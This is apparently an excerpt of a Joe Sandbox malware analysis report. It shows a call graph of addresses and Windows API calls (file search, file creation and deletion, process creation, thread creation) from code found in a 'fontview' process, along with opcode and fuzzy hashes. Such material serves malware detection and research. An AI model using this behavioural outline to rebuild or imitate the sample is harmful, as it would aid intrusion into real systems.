96340 2a55bd8 96338->96340 96339 2a55bfc 96339->96330 96340->96339 96349 2a54960 96340->96349 96343 2a57050 2 API calls 96344 2a55c6a 96343->96344 96344->96330 96346 2a554cd 96345->96346 96347 2a56230 LdrLoadDll 96346->96347 96348 2a5212d 96347->96348 96348->96328 96350 2a5497a 96349->96350 96351 2a56230 LdrLoadDll 96350->96351 96352 2a5498b 96351->96352 96355 4ab2c0a 96352->96355 96353 2a549a6 96353->96343 96356 4ab2c1f LdrInitializeThunk 96355->96356 96357 4ab2c11 96355->96357 96356->96353 96357->96353 96359 2a41fe5 96358->96359 96376 2a471c0 96359->96376 96361 2a41fed 96362 2a42249 96361->96362 96363 2a57130 2 API calls 96361->96363 96362->96322 96364 2a42003 96363->96364 96365 2a57130 2 API calls 96364->96365 96366 2a42014 96365->96366 96367 2a57130 2 API calls 96366->96367 96368 2a42025 96367->96368 96388 2a45810 96368->96388 96370 2a4208d 96375 2a420b8 96370->96375 96418 2a46420 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96370->96418 96372 2a42032 96372->96370 96417 2a45990 LdrLoadDll 96372->96417 96398 2a41ac0 96375->96398 96377 2a471ec 96376->96377 96419 2a44550 96377->96419 96379 2a471fe 96423 2a470b0 96379->96423 96382 2a47231 96385 2a47242 96382->96385 96387 2a55240 2 API calls 96382->96387 96383 2a47219 96384 2a47224 96383->96384 96386 2a55240 2 API calls 96383->96386 96384->96361 96385->96361 96386->96384 96387->96385 96389 2a45826 96388->96389 96390 2a45830 96388->96390 96389->96372 96391 2a444a0 LdrLoadDll 96390->96391 96392 2a458c9 96391->96392 96393 2a443e0 LdrLoadDll 96392->96393 96395 2a458dd 96393->96395 96394 2a45903 96394->96372 96395->96394 96396 2a444a0 LdrLoadDll 96395->96396 96397 2a4592a 96396->96397 96397->96372 96400 2a41ada 96398->96400 96444 2a47480 96398->96444 96401 2a41fa5 96400->96401 96450 2a50100 96400->96450 96401->96362 96404 2a41ce1 96458 2a58260 96404->96458 96406 2a41b38 96406->96401 96453 2a58130 96406->96453 96407 2a41cf6 96413 2a41d0c 96407->96413 96464 2a402a0 96407->96464 96408 2a402a0 
4 API calls 96408->96413 96411 2a41dc3 96411->96413 96477 2a40560 96411->96477 96413->96401 96413->96408 96414 2a40560 2 API calls 96413->96414 96481 2a47420 96413->96481 96414->96413 96415 2a47420 LdrLoadDll LdrInitializeThunk 96416 2a41e3a 96415->96416 96416->96413 96416->96415 96417->96370 96418->96375 96420 2a44596 96419->96420 96421 2a443e0 LdrLoadDll 96420->96421 96422 2a44629 96421->96422 96422->96379 96424 2a470ca 96423->96424 96432 2a471a6 96423->96432 96425 2a444a0 LdrLoadDll 96424->96425 96426 2a4710f 96425->96426 96433 2a549b0 96426->96433 96428 2a47154 96437 2a54a00 96428->96437 96431 2a55240 2 API calls 96431->96432 96432->96382 96432->96383 96434 2a549ca 96433->96434 96435 2a56230 LdrLoadDll 96434->96435 96436 2a549db 96435->96436 96436->96428 96438 2a54a1d 96437->96438 96439 2a56230 LdrLoadDll 96438->96439 96440 2a54a2e 96439->96440 96443 4ab35c0 LdrInitializeThunk 96440->96443 96441 2a4719a 96441->96431 96443->96441 96445 2a4748d 96444->96445 96446 2a50c00 LdrLoadDll 96445->96446 96447 2a474a7 96446->96447 96448 2a474b5 96447->96448 96449 2a474ae SetErrorMode 96447->96449 96448->96400 96449->96448 96451 2a50121 96450->96451 96452 2a56fc0 2 API calls 96450->96452 96451->96406 96452->96451 96454 2a58146 96453->96454 96455 2a58140 96453->96455 96456 2a57130 2 API calls 96454->96456 96455->96404 96457 2a5816c 96456->96457 96457->96404 96459 2a581d0 96458->96459 96460 2a57130 2 API calls 96459->96460 96461 2a5822d 96459->96461 96462 2a5820a 96460->96462 96461->96407 96463 2a57050 2 API calls 96462->96463 96463->96461 96465 2a402b0 96464->96465 96466 2a402ab 96464->96466 96467 2a56fc0 2 API calls 96465->96467 96466->96411 96470 2a402d5 96467->96470 96468 2a4033c 96468->96411 96470->96468 96471 2a40342 96470->96471 96476 2a56fc0 2 API calls 96470->96476 96485 2a54910 96470->96485 96491 2a55460 96470->96491 96473 2a4036c 96471->96473 96474 2a55460 2 API calls 96471->96474 96473->96411 96475 2a4035d 96474->96475 96475->96411 96476->96470 96478 2a4057c 
96477->96478 96479 2a55460 2 API calls 96478->96479 96480 2a40582 96479->96480 96480->96416 96482 2a47433 96481->96482 96499 2a54890 96482->96499 96484 2a4745e 96484->96413 96486 2a5492a 96485->96486 96487 2a56230 LdrLoadDll 96486->96487 96488 2a5493b 96487->96488 96497 4ab2df0 LdrInitializeThunk 96488->96497 96489 2a54952 96489->96470 96492 2a5547a 96491->96492 96493 2a56230 LdrLoadDll 96492->96493 96494 2a5548b 96493->96494 96498 4ab2c70 LdrInitializeThunk 96494->96498 96495 2a554a2 96495->96470 96497->96489 96498->96495 96500 2a548b1 96499->96500 96501 2a548e3 96499->96501 96502 2a56230 LdrLoadDll 96500->96502 96503 2a56230 LdrLoadDll 96501->96503 96504 2a548cb 96502->96504 96505 2a548f9 96503->96505 96504->96484 96508 4ab2dd0 LdrInitializeThunk 96505->96508 96506 2a54908 96506->96484 96508->96506 96509 2a4e8b0 96510 2a4e8fc 96509->96510 96511 2a444a0 LdrLoadDll 96510->96511 96512 2a4ea07 96511->96512 96513 2a45cc0 3 API calls 96512->96513 96515 2a4ea3d 96513->96515 96514 2a4ea44 96515->96514 96516 2a444a0 LdrLoadDll 96515->96516 96517 2a4ea80 96516->96517 96518 2a45dd0 2 API calls 96517->96518 96520 2a4eac0 96518->96520 96519 2a4ebe3 96520->96519 96521 2a4ebf2 96520->96521 96543 2a4e690 96520->96543 96522 2a55240 2 API calls 96521->96522 96524 2a4ebfc 96522->96524 96525 2a4eaf5 96525->96521 96526 2a4eb00 96525->96526 96527 2a57130 2 API calls 96526->96527 96528 2a4eb29 96527->96528 96529 2a4eb32 96528->96529 96530 2a4eb48 96528->96530 96531 2a55240 2 API calls 96529->96531 96572 2a4e580 CoInitialize 96530->96572 96534 2a4eb3c 96531->96534 96533 2a4eb56 96574 2a54d80 96533->96574 96536 2a4ebd2 96537 2a55240 2 API calls 96536->96537 96539 2a4ebdc 96537->96539 96540 2a57050 2 API calls 96539->96540 96540->96519 96541 2a4eb74 96541->96536 96542 2a54d80 2 API calls 96541->96542 96580 2a4e4b0 LdrLoadDll RtlFreeHeap 96541->96580 96542->96541 96544 2a4e6ac 96543->96544 96545 2a441c0 LdrLoadDll 96544->96545 96547 2a4e6ca 96545->96547 96546 2a4e6d3 96546->96525 
96547->96546 96548 2a50c00 LdrLoadDll 96547->96548 96549 2a4e6f0 96548->96549 96550 2a50c00 LdrLoadDll 96549->96550 96551 2a4e70b 96550->96551 96552 2a50c00 LdrLoadDll 96551->96552 96553 2a4e724 96552->96553 96554 2a50c00 LdrLoadDll 96553->96554 96555 2a4e740 96554->96555 96556 2a50c00 LdrLoadDll 96555->96556 96557 2a4e759 96556->96557 96558 2a50c00 LdrLoadDll 96557->96558 96559 2a4e772 96558->96559 96560 2a441c0 LdrLoadDll 96559->96560 96562 2a4e79e 96560->96562 96561 2a4e84d 96561->96525 96562->96561 96563 2a50c00 LdrLoadDll 96562->96563 96564 2a4e7c3 96563->96564 96565 2a441c0 LdrLoadDll 96564->96565 96566 2a4e7f8 96565->96566 96566->96561 96567 2a50c00 LdrLoadDll 96566->96567 96568 2a4e81b 96567->96568 96569 2a50c00 LdrLoadDll 96568->96569 96570 2a4e834 96569->96570 96571 2a50c00 LdrLoadDll 96570->96571 96571->96561 96573 2a4e5e5 96572->96573 96573->96533 96575 2a54d9d 96574->96575 96576 2a56230 LdrLoadDll 96575->96576 96577 2a54dae 96576->96577 96581 4ab2ba0 LdrInitializeThunk 96577->96581 96578 2a54dcd 96578->96541 96580->96541 96581->96578 96582 2a44cf0 96584 2a44d1a 96582->96584 96583 2a50100 2 API calls 96585 2a44db9 96583->96585 96584->96583 96607 2a45188 96584->96607 96585->96607 96608 2a40b00 9 API calls 96585->96608 96587 2a44e27 96588 2a57050 2 API calls 96587->96588 96587->96607 96590 2a44e3f 96588->96590 96589 2a44e71 96595 2a44e78 96589->96595 96628 2a47250 96589->96628 96590->96589 96627 2a33910 LdrLoadDll LdrInitializeThunk 96590->96627 96592 2a44eb1 96592->96607 96635 2a54b00 96592->96635 96595->96607 96609 2a545f0 96595->96609 96597 2a44f0e 96618 2a54670 96597->96618 96599 2a45117 96603 2a4513a 96599->96603 96645 2a54770 96599->96645 96600 2a44f2e 96600->96599 96644 2a33980 LdrLoadDll LdrInitializeThunk 96600->96644 96604 2a47420 2 API calls 96603->96604 96605 2a45157 96603->96605 96604->96603 96654 2a555a0 LdrLoadDll 96605->96654 96608->96587 96610 2a54640 96609->96610 96611 2a5460e 96609->96611 96612 2a56230 LdrLoadDll 96610->96612 96613 
2a56230 LdrLoadDll 96611->96613 96614 2a54656 96612->96614 96615 2a54628 96613->96615 96655 4ab39b0 LdrInitializeThunk 96614->96655 96615->96597 96616 2a54665 96616->96597 96619 2a5468e 96618->96619 96620 2a546c0 96618->96620 96621 2a56230 LdrLoadDll 96619->96621 96622 2a56230 LdrLoadDll 96620->96622 96623 2a546a8 96621->96623 96624 2a546d6 96622->96624 96623->96600 96656 4ab4340 LdrInitializeThunk 96624->96656 96625 2a546e5 96625->96600 96627->96589 96629 2a4726d 96628->96629 96657 2a54a50 96629->96657 96631 2a472bd 96632 2a472c4 96631->96632 96633 2a54b00 2 API calls 96631->96633 96632->96592 96634 2a472ed 96633->96634 96634->96592 96636 2a54b70 96635->96636 96637 2a54b1e 96635->96637 96639 2a56230 LdrLoadDll 96636->96639 96638 2a56230 LdrLoadDll 96637->96638 96641 2a54b38 96638->96641 96640 2a54b86 96639->96640 96667 4ab2d10 LdrInitializeThunk 96640->96667 96641->96595 96642 2a54bb5 96642->96595 96644->96599 96646 2a547c3 96645->96646 96647 2a54791 96645->96647 96648 2a56230 LdrLoadDll 96646->96648 96649 2a56230 LdrLoadDll 96647->96649 96650 2a547d9 96648->96650 96651 2a547ab 96649->96651 96668 4ab2fb0 LdrInitializeThunk 96650->96668 96651->96603 96652 2a547e8 96652->96603 96654->96607 96655->96616 96656->96625 96658 2a54ab4 96657->96658 96659 2a54a6e 96657->96659 96660 2a56230 LdrLoadDll 96658->96660 96661 2a56230 LdrLoadDll 96659->96661 96662 2a54aca 96660->96662 96663 2a54a88 96661->96663 96666 4ab2f30 LdrInitializeThunk 96662->96666 96663->96631 96664 2a54aed 96664->96631 96666->96664 96667->96642 96668->96652 96669 2a46770 96670 2a4679e 96669->96670 96671 2a47250 3 API calls 96670->96671 96672 2a467c6 96671->96672 96673 2a467cd 96672->96673 96674 2a57170 2 API calls 96672->96674 96675 2a467dd 96674->96675 96676 2a50af0 96677 2a50aff 96676->96677 96678 2a50b43 96677->96678 96681 2a50b84 96677->96681 96683 2a50b89 96677->96683 96679 2a57050 2 API calls 96678->96679 96680 2a50b53 96679->96680 96682 2a57050 2 API calls 96681->96682 96682->96683 96684 2a48bf1 
96692 2a48c00 96684->96692 96685 2a48c07 96686 2a50c00 LdrLoadDll 96686->96692 96687 2a48cef GetFileAttributesW 96687->96692 96688 2a48e9a 96689 2a48eb3 96688->96689 96690 2a57050 2 API calls 96688->96690 96690->96689 96691 2a444a0 LdrLoadDll 96691->96692 96692->96685 96692->96686 96692->96687 96692->96688 96692->96691 96693 2a4c8c0 2 API calls 96692->96693 96696 2a51ae0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96692->96696 96697 2a51980 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96692->96697 96693->96692 96696->96692 96697->96692 96698 2a547f0 96699 2a54811 96698->96699 96700 2a5484f 96698->96700 96701 2a56230 LdrLoadDll 96699->96701 96702 2a56230 LdrLoadDll 96700->96702 96703 2a5482b 96701->96703 96704 2a54865 96702->96704 96707 4ab2ee0 LdrInitializeThunk 96704->96707 96705 2a54880 96707->96705 96708 2a53f30 96709 2a53f8a 96708->96709 96711 2a53f97 96709->96711 96712 2a524d0 96709->96712 96713 2a56fc0 2 API calls 96712->96713 96715 2a52511 96713->96715 96714 2a52616 96714->96711 96715->96714 96716 2a441c0 LdrLoadDll 96715->96716 96717 2a52557 96716->96717 96718 2a50c00 LdrLoadDll 96717->96718 96719 2a5257c 96718->96719 96719->96714 96720 2a52590 Sleep 96719->96720 96720->96719 96721 2a54472 96722 2a5447a 96721->96722 96723 2a5447d 96722->96723 96724 2a5440c RtlDosPathNameToNtPathName_U 96722->96724 96725 2a42f3c 96726 2a470b0 3 API calls 96725->96726 96727 2a42f4c 96726->96727 96728 2a42f7a 96727->96728 96729 2a42f61 96727->96729 96731 2a55240 2 API calls 96727->96731 96733 2a3f9c0 LdrLoadDll 96729->96733 96731->96729 96732 2a42f6b 96733->96732 96735 2a502c1 96749 2a55100 96735->96749 96737 2a502e2 96738 2a502f9 96737->96738 96756 2a54ee0 LdrLoadDll 96737->96756 96740 2a50315 96738->96740 96741 2a50300 96738->96741 96743 2a55240 2 API calls 96740->96743 96742 2a55240 2 API calls 96741->96742 96744 2a50309 96742->96744 96746 2a5031e 96743->96746 96745 2a5034a 96746->96745 96747 2a57050 2 API calls 96746->96747 96748 2a5033e 96747->96748 96750 2a5511e 
96749->96750 96751 2a5516c 96749->96751 96752 2a56230 LdrLoadDll 96750->96752 96753 2a56230 LdrLoadDll 96751->96753 96754 2a55138 96752->96754 96755 2a55182 NtReadFile 96753->96755 96754->96737 96755->96737 96756->96738 96757 2a4c440 96758 2a4c462 96757->96758 96759 2a444a0 LdrLoadDll 96758->96759 96760 2a4c653 96759->96760 96761 2a444a0 LdrLoadDll 96760->96761 96762 2a4c678 96761->96762 96763 2a443e0 LdrLoadDll 96762->96763 96764 2a4c68c 96763->96764 96788 2a4c300 96764->96788 96767 2a4c300 6 API calls 96768 2a4c702 96767->96768 96769 2a4c300 6 API calls 96768->96769 96770 2a4c71a 96769->96770 96771 2a4c300 6 API calls 96770->96771 96772 2a4c732 96771->96772 96773 2a4c300 6 API calls 96772->96773 96774 2a4c74d 96773->96774 96775 2a4c300 6 API calls 96774->96775 96776 2a4c765 96775->96776 96777 2a4c77f 96776->96777 96778 2a4c300 6 API calls 96776->96778 96779 2a4c7b3 96778->96779 96780 2a4c300 6 API calls 96779->96780 96781 2a4c7f0 96780->96781 96782 2a4c300 6 API calls 96781->96782 96783 2a4c82d 96782->96783 96784 2a4c300 6 API calls 96783->96784 96785 2a4c86a 96784->96785 96786 2a4c300 6 API calls 96785->96786 96787 2a4c8a7 96786->96787 96789 2a4c329 96788->96789 96790 2a50c00 LdrLoadDll 96789->96790 96791 2a4c369 96790->96791 96792 2a50c00 LdrLoadDll 96791->96792 96793 2a4c387 96792->96793 96794 2a50c00 LdrLoadDll 96793->96794 96796 2a4c3a9 96794->96796 96795 2a4c42d 96795->96767 96796->96795 96797 2a4c3d3 FindFirstFileW 96796->96797 96797->96795 96801 2a4c3ee 96797->96801 96798 2a4c414 FindNextFileW 96799 2a4c426 FindClose 96798->96799 96798->96801 96799->96795 96801->96798 96802 2a4c210 6 API calls 96801->96802 96802->96801 96803 2a551c0 96804 2a551e1 96803->96804 96805 2a5520f 96803->96805 96807 2a56230 LdrLoadDll 96804->96807 96806 2a56230 LdrLoadDll 96805->96806 96808 2a55225 NtDeleteFile 96806->96808 96809 2a551fb 96807->96809 96810 2a39950 96811 2a3995f 96810->96811 96812 2a50c00 LdrLoadDll 96811->96812 96813 2a3997a 96812->96813 96814 2a399a0 
96813->96814 96815 2a3998d CreateThread 96813->96815 96816 2a4fa90 96817 2a4fab8 96816->96817 96818 2a444a0 LdrLoadDll 96817->96818 96819 2a4faf2 96818->96819 96820 2a45cc0 3 API calls 96819->96820 96822 2a4fb18 96820->96822 96821 2a4fb1f 96822->96821 96823 2a444a0 LdrLoadDll 96822->96823 96824 2a4fb5b 96823->96824 96825 2a444a0 LdrLoadDll 96824->96825 96826 2a4fb90 96825->96826 96827 2a45dd0 2 API calls 96826->96827 96828 2a4fbb4 96827->96828 96829 2a4fbf6 96828->96829 96842 2a4fd8a 96828->96842 96845 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96828->96845 96831 2a444a0 LdrLoadDll 96829->96831 96832 2a4fc27 96831->96832 96833 2a45dd0 2 API calls 96832->96833 96836 2a4fc4b 96833->96836 96834 2a4fc91 96835 2a45dd0 2 API calls 96834->96835 96840 2a4fcc1 96835->96840 96836->96834 96836->96842 96846 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96836->96846 96838 2a4fd07 96841 2a45dd0 2 API calls 96838->96841 96840->96838 96840->96842 96847 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96840->96847 96843 2a4fd66 96841->96843 96843->96842 96848 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96843->96848 96845->96829 96846->96834 96847->96838 96848->96842 96849 2a46ad0 96850 2a46b42 96849->96850 96851 2a46ae8 96849->96851 96851->96850 96852 2a4a170 LdrLoadDll 96851->96852 96853 2a46b2c 96852->96853 96853->96850 96855 2a4a400 96853->96855 96856 2a4a426 96855->96856 96857 2a50c00 LdrLoadDll 96856->96857 96859 2a4a47a 96857->96859 96858 2a4a7f3 96858->96850 96859->96858 96902 2a555e0 96859->96902 96861 2a4a4cb 96862 2a4a7db 96861->96862 96864 2a58260 3 API calls 96861->96864 96863 2a57050 2 API calls 96862->96863 96863->96858 96865 2a4a4ea 96864->96865 96865->96862 96866 2a4a5f3 96865->96866 96867 2a54960 2 API calls 96865->96867 96909 2a454e0 LdrLoadDll LdrInitializeThunk LdrInitializeThunk 96866->96909 96868 2a4a571 96867->96868 96868->96866 96872 
2a4a579 96868->96872 96870 2a4a61e 96870->96862 96874 2a4a653 96870->96874 96877 2a453d0 2 API calls 96870->96877 96871 2a4a5d9 96875 2a57050 2 API calls 96871->96875 96872->96858 96872->96871 96873 2a4a5a8 96872->96873 96906 2a453d0 96872->96906 96878 2a55240 2 API calls 96873->96878 96882 2a4a683 96874->96882 96883 2a4a7ba 96874->96883 96879 2a4a5e9 96875->96879 96877->96874 96880 2a4a5b8 96878->96880 96879->96850 96910 2a52750 LdrLoadDll LdrInitializeThunk 96880->96910 96911 2a552d0 96882->96911 96885 2a57050 2 API calls 96883->96885 96886 2a4a7d1 96885->96886 96886->96850 96887 2a4a6a2 96888 2a47250 3 API calls 96887->96888 96889 2a4a70b 96888->96889 96889->96862 96890 2a4a716 96889->96890 96891 2a57050 2 API calls 96890->96891 96892 2a4a73a 96891->96892 96920 2a54bc0 96892->96920 96895 2a54b00 2 API calls 96896 2a4a775 96895->96896 96897 2a4a77c 96896->96897 96898 2a54bc0 2 API calls 96896->96898 96897->96850 96899 2a4a7a2 96898->96899 96900 2a54770 2 API calls 96899->96900 96901 2a4a7b0 96900->96901 96901->96850 96903 2a555fa 96902->96903 96904 2a56230 LdrLoadDll 96903->96904 96905 2a5560b CreateProcessInternalW 96904->96905 96905->96861 96907 2a54b00 2 API calls 96906->96907 96908 2a4540e 96907->96908 96908->96873 96909->96870 96910->96871 96912 2a5532c 96911->96912 96913 2a552ee 96911->96913 96915 2a56230 LdrLoadDll 96912->96915 96914 2a56230 LdrLoadDll 96913->96914 96916 2a55308 96914->96916 96917 2a55342 96915->96917 96916->96887 96926 4ab2e80 LdrInitializeThunk 96917->96926 96918 2a5535d 96918->96887 96921 2a54bdd 96920->96921 96922 2a56230 LdrLoadDll 96921->96922 96923 2a54bee 96922->96923 96927 4ab2d30 LdrInitializeThunk 96923->96927 96924 2a4a74e 96924->96895 96926->96918 96927->96924 96928 2a4ec10 96929 2a4ec21 96928->96929 96931 2a4d890 96928->96931 96932 2a4d8b6 96931->96932 96933 2a444a0 LdrLoadDll 96932->96933 96934 2a4d90d 96933->96934 96935 2a444a0 LdrLoadDll 96934->96935 96937 2a4d94d 96934->96937 96935->96937 96936 2a47670 2 API calls 96939 
2a4da31 96936->96939 96937->96936 96938 2a4da38 96938->96929 96939->96938 96941 2a4d570 96939->96941 96942 2a4d593 96941->96942 96943 2a51db0 3 API calls 96942->96943 96945 2a4d5a0 96943->96945 96944 2a4d5f5 96944->96939 96945->96944 96946 2a4d601 96945->96946 96947 2a4d5bf 96945->96947 96952 2a444a0 LdrLoadDll 96946->96952 96948 2a4d5e4 96947->96948 96949 2a4d5c7 96947->96949 96951 2a57050 2 API calls 96948->96951 96950 2a57050 2 API calls 96949->96950 96953 2a4d5d8 96950->96953 96951->96944 96954 2a4d623 96952->96954 96953->96939 96955 2a4c8c0 2 API calls 96954->96955 96956 2a4d645 96955->96956 96960 2a4d65d 96956->96960 96961 2a4d748 96956->96961 96957 2a4d72f 96958 2a57050 2 API calls 96957->96958 96959 2a4d853 96958->96959 96959->96939 96960->96957 96964 2a4ced0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96960->96964 96961->96957 96965 2a4ced0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96961->96965 96964->96960 96965->96961 96966 2a45450 96967 2a47420 2 API calls 96966->96967 96968 2a45480 96967->96968 96970 2a454ac 96968->96970 96971 2a473a0 96968->96971 96979 2a54560 96971->96979 96973 2a473e4 96974 2a47405 96973->96974 96986 2a546f0 96973->96986 96974->96968 96976 2a473f5 96977 2a47411 96976->96977 96978 2a55240 2 API calls 96976->96978 96977->96968 96978->96974 96980 2a5457e 96979->96980 96981 2a545b8 96979->96981 96982 2a56230 LdrLoadDll 96980->96982 96983 2a56230 LdrLoadDll 96981->96983 96984 2a54598 96982->96984 96985 2a545ce 96983->96985 96984->96973 96985->96973 96987 2a54711 96986->96987 96988 2a54743 96986->96988 96989 2a56230 LdrLoadDll 96987->96989 96990 2a56230 LdrLoadDll 96988->96990 96993 2a5472b 96989->96993 96991 2a54759 96990->96991 96995 4ab4650 LdrInitializeThunk 96991->96995 96992 2a54768 96992->96976 96993->96976 96995->96992 96996 2a4f190 96997 2a4f1ad 96996->96997 96998 2a441c0 LdrLoadDll 96997->96998 96999 2a4f1cb 96998->96999 97000 2a50c00 LdrLoadDll 96999->97000 97017 2a4f3d4 96999->97017 97001 2a4f1fb 97000->97001 97002 
2a50c00 LdrLoadDll 97001->97002 97003 2a4f214 97002->97003 97004 2a50c00 LdrLoadDll 97003->97004 97005 2a4f22d 97004->97005 97006 2a50c00 LdrLoadDll 97005->97006 97007 2a4f249 97006->97007 97008 2a50c00 LdrLoadDll 97007->97008 97009 2a4f262 97008->97009 97010 2a50c00 LdrLoadDll 97009->97010 97011 2a4f27b 97010->97011 97012 2a50c00 LdrLoadDll 97011->97012 97013 2a4f297 97012->97013 97014 2a50c00 LdrLoadDll 97013->97014 97015 2a4f2b0 97014->97015 97016 2a50c00 LdrLoadDll 97015->97016 97018 2a4f2c8 97016->97018 97018->97017 97020 2a4ed50 LdrLoadDll 97018->97020 97020->97018 97021 2a409d0 97022 2a409e9 97021->97022 97023 2a441c0 LdrLoadDll 97022->97023 97024 2a40a07 97023->97024 97025 2a50c00 LdrLoadDll 97024->97025 97026 2a40a1f 97025->97026 97027 2a40a53 97026->97027 97028 2a40a40 PostThreadMessageW 97026->97028 97028->97027 97029 2a46910 97030 2a4692c 97029->97030 97042 2a46a0f 97029->97042 97032 2a55240 2 API calls 97030->97032 97030->97042 97031 2a46aa2 97033 2a46947 97032->97033 97043 2a45f50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97033->97043 97035 2a46a7f 97035->97031 97045 2a46120 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97035->97045 97038 2a4697f 97039 2a444a0 LdrLoadDll 97038->97039 97040 2a469ac 97039->97040 97041 2a444a0 LdrLoadDll 97040->97041 97041->97042 97042->97031 97044 2a45f50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97042->97044 97043->97038 97044->97035 97045->97031 97046 2a58190 97047 2a57050 2 API calls 97046->97047 97048 2a581a5 97047->97048 97049 2a54fd0 97050 2a55047 97049->97050 97051 2a54ff1 97049->97051 97053 2a56230 LdrLoadDll 97050->97053 97052 2a56230 LdrLoadDll 97051->97052 97054 2a5500b 97052->97054 97055 2a5505d NtCreateFile 97053->97055 97056 2a4555c 97057 2a45504 97056->97057 97060 2a45560 97056->97060 97058 2a45516 97057->97058 97059 2a54960 2 API calls 97057->97059 97061 2a552d0 2 API calls 97058->97061 97059->97058 97062 2a4552b 97061->97062 97063 4ab2ad0 LdrInitializeThunk

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %$%$1P$6@$?=$D$H$HV$I&$L$M$M$P$W$[1$_$e$i$iU$o$o%$P
                                                                                                                              • API String ID: 0-528503831
                                                                                                                              • Opcode ID: 4760c2df78d8db34c4257b5b400173bb445f35f6a5915b541e8bb60b579bc216
                                                                                                                              • Instruction ID: 5f8562891632a9ac9490a4e0ae1d5937288470a57502b6a57e4c38a657a6077e
                                                                                                                              • Opcode Fuzzy Hash: 4760c2df78d8db34c4257b5b400173bb445f35f6a5915b541e8bb60b579bc216
                                                                                                                              • Instruction Fuzzy Hash: A342A1B0D0522ACBEB25CF44C998BEEBBB1BB45308F1081D9D5596B281DBB55E89CF40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A4C3E4
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02A4C41F
                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02A4C42A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: c2aecdd4c86bb0b527e38703e58ca2a0e437c83e7f047480f032a980cb14c1cd
                                                                                                                              • Instruction ID: 5098ed42ed6a3dd468d4fcec3b8d19cab261c6dbbf0dc24856e976c147b24452
                                                                                                                              • Opcode Fuzzy Hash: c2aecdd4c86bb0b527e38703e58ca2a0e437c83e7f047480f032a980cb14c1cd
                                                                                                                              • Instruction Fuzzy Hash: B331AFB5940208BBDB21DF64DD89FFFB77D9F84754F104459B908A7180EE70AA85CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID: "x8#
                                                                                                                              • API String ID: 2340568224-3294973128
                                                                                                                              • Opcode ID: b54912117a70023ceeb8a3232e118cb22f1c399f596a31843e6eec0ad5832308
                                                                                                                              • Instruction ID: 1d3f10641746bc917d11d33893cc73dda3294baeec066d52b8252fb43c125bee
                                                                                                                              • Opcode Fuzzy Hash: b54912117a70023ceeb8a3232e118cb22f1c399f596a31843e6eec0ad5832308
                                                                                                                              • Instruction Fuzzy Hash: 1DE1A0B1D40218ABDB24DFA0DD81BFFB7B9AF84304F14455AE909A6141EF70A785CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A5508E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 8c8f54b6705e79f3e07e229fca26c084e98c70d9e8aebe4724d89cba79aba75e
                                                                                                                              • Instruction ID: 057b15d44532757883d1cfafa9a3af207159c34bca3dd6c69984b9fb9b1a2356
                                                                                                                              • Opcode Fuzzy Hash: 8c8f54b6705e79f3e07e229fca26c084e98c70d9e8aebe4724d89cba79aba75e
                                                                                                                              • Instruction Fuzzy Hash: D221A2B2210549BFDB44DF99DC81EEB73AEAF8C714F508208FA5D97240DA30E8518BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A551AB
                                                                                                                              Memory Dump Source
